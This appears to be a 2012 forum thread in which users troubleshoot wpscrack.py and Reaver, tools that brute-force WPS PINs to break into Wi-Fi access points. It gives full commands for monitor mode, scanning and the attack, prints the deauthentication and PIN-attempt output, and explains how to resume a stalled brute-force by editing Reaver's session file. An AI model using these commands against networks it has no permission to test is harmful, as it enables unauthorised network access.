Results 1 to 6 of 6

Thread: =WPSCRACK Thread=

  1. #1
    Just burned his ISO
    Join Date
    Sep 2012
    Posts
    11

    Post =WPSCRACK Thread=

    hello , after quick search , i dont see any thread about WPSCRACK ,so i made it for this tool.
    so im a newbie linux ,but have made few try on BT.

    there is my probleme / bug , i made this :

    airmon-ng start wlan0
    wlan0 Realtek RTL8187L rtl8187 - [phy0] (monitor mode enabled on mon0)

    airodump-ng mon0 -c 1

    BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

    XX:1B:5E:B5:XX.XX -54 93 2079 37 0 1 54e WPA2 CCMP PSK ESSSID

    BSSID STATION PWR Rate Lost Frames Probe

    XX:1B:5E:B5:XX:XX YY:E0:C5:04:YY:YY 0 -65 0 - 1 0 8

    (i got association ,and AP is WPS (tryed with reaver & FERN)

    so i start attack on it :

    ./wpscrack.py --iface=mon0 --client YY:E0:C5:04:YY:YY --bssid XX:1B:5E:B5:XX:XX --ssid ESSSID --dh 0 -v

    and i got this error :

    WARNING: No route found for IPv6 destination :: (no default route?)
    sniffer started
    Exception in thread Thread-1:
    Traceback (most recent call last):
    File "/usr/lib/python2.6/threading.py", line 532, in __bootstrap_inner
    self.run()
    File "/usr/lib/python2.6/threading.py", line 484, in run
    self.__target(*self.__args, **self.__kwargs)
    File "./wpscrack.py", line 516, in sniffer
    sniff(store=0, stop_filter=lambda x: self.sniffer_filter(x))
    File "/usr/lib/pymodules/python2.6/scapy/sendrecv.py", line 534, in sniff
    s = L2socket(type=ETH_P_ALL, *arg, **karg)
    TypeError: __init__() got an unexpected keyword argument 'stop_filter'

    ------------------- attempt #1
    Trying 00000000
    -> 802.11 deauthentication
    -> 802.11 authentication request
    TIMEOUT!!
    -> 802.11 deauthentication
    attempt took 5.062 seconds
    ------------------- attempt #2
    Trying 00000000
    -> 802.11 deauthentication
    -> 802.11 authentication request
    TIMEOUT!!
    -> 802.11 deauthentication
    attempt took 5.054 seconds


    this attack work with fern & reaver , but i cant resume manually
    and her auto save , dont work fine here (work 1 time ,at 2th stop attack restart to begin .... )

    any one have idea about where come the probleme ?

    wpscrack.py file is copyed in home floder
    permissions : owner : root
    acces : read & write
    group : root
    acces : read & write
    others
    acces : read & write
    execute : allow executing file as program

    (sorry im a newbie on linux ,all help or idea are welcome here )

  2. #2
    Good friend of the forums zimmaro's Avatar
    Join Date
    Mar 2010
    Location
    milano
    Posts
    407

    Default Re: =WPSCRACK Thread=

    hi
    Step 2 you link that helped ME to solve in my bt5-r3 ((many thanks to authors))
    for good scapy install..... scapy 2.2.0:

    http://trac.secdev.org/scapy/ticket/771 (This is perhaps not needed .. I do not know) for cert.py


    for wpscrack.py...:

    http://www.hack4fun.eu/2012/01/reaver-wps-wpscrack/ #traslate of czech republic


    this is my bt5-r3:

    root@bt:~/wpscrack# ./wpscrack.py --help
    Usage: wpscrack.py --iface=IFACE --client=CLIENT_MAC --bssid=BSSID --ssid=SSID [optional arguments]

    Options:
    -h, --help show this help message and exit
    -i IFACE, --iface=IFACE
    network interface (monitor mode)
    -c CLIENT_MAC, --client=CLIENT_MAC
    MAC of client interface
    -b BSSID, --bssid=BSSID
    MAC of AP (BSSID)
    -s SSID, --ssid=SSID SSID of AP (ESSID)
    --dh=DH_SECRET diffie-hellman secret number
    -t TIMEOUT, --timeout=TIMEOUT
    timemout in seconds
    -p START_PIN, --pin=START_PIN
    start pin for brute force
    -v, --verbose verbose

    root@bt:~/wpscrack# ./wpscrack.py --iface=mon0 --client B8:xF:6x:AC:xx:02 --bssid 00:1x:6x:A6:Ax:04 --ssid Alice-78x9xxx4 --dh 0 -v
    sniffer started
    ------------------- attempt #1
    Trying 00000000
    -> 802.11 deauthentication
    -> 802.11 authentication request
    TIMEOUT!!
    -> 802.11 deauthentication
    attempt took 5.131 seconds
    ------------------- attempt #2
    Trying 00000000
    -> 802.11 deauthentication
    -> 802.11 authentication request
    TIMEOUT!!
    -> 802.11 deauthentication
    attempt took 5.060 seconds
    ------------------- attempt #3
    Trying 00000001
    -> 802.11 deauthentication
    -> 802.11 authentication request
    .............................
    ..............................................
    .................................................. ............
    bye

  3. #3
    Senior Member
    Join Date
    Feb 2012
    Location
    Cyberspace
    Posts
    174

    Default Re: =WPSCRACK Thread=

    To me it feels like reinventing the wheel..if you really like to crack WPS..reaver is the original tool and fully customizable. Yes you can start from any pin you want. You just need to edit the db file (.wpc) located here:

    /usr/local/etc/reaver/AAAAAAAA.wpc


    If You like to crack WPS in a fully automated way then you can use wifite tool located here:
    root@bt:/pentest/wireless/wifite# (in BT5 R3)

    Hope this helps.

  4. #4
    Just burned his ISO
    Join Date
    Sep 2012
    Posts
    11

    Default Re: =WPSCRACK Thread=

    i have found reaver floder ;
    usr / local / ect / reaver

    i have the file name 84XXXXXXX8.wpc

    but i have all tryied pin in ;

    if i put a pin like 7400 and save ,reaver resume at 7400 ??
    or retry all exept 7400 ?

    i have retry my network testing , im at 25.36% (36h running)
    and dont really want to restart from 0 ....
    Last edited by flatounet; 10-11-2012 at 05:32 AM.

  5. #5
    Senior Member
    Join Date
    Feb 2012
    Location
    Cyberspace
    Posts
    174

    Default Re: =WPSCRACK Thread=

    Please look here:
    http://code.google.com/p/reaver-wps/issues/list

    Troll through this list and you will find your answer. This is how I found answers to my queries.

  6. #6
    Junior Member
    Join Date
    Jun 2011
    Location
    UK
    Posts
    45

    Default Re: =WPSCRACK Thread=

    Quote Originally Posted by flatounet View Post
    i have found reaver floder ;
    usr / local / ect / reaver

    i have the file name 84XXXXXXX8.wpc

    but i have all tryied pin in ;

    if i put a pin like 7400 and save ,reaver resume at 7400 ??
    or retry all exept 7400 ?

    i have retry my network testing , im at 25.36% (36h running)
    and dont really want to restart from 0 ....
    if you want to restart reaver from 7400 you will have to edit the file and put 7405 at the top and save it, reaver then will restart from 7004 7005 7006 7007 and so on,

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •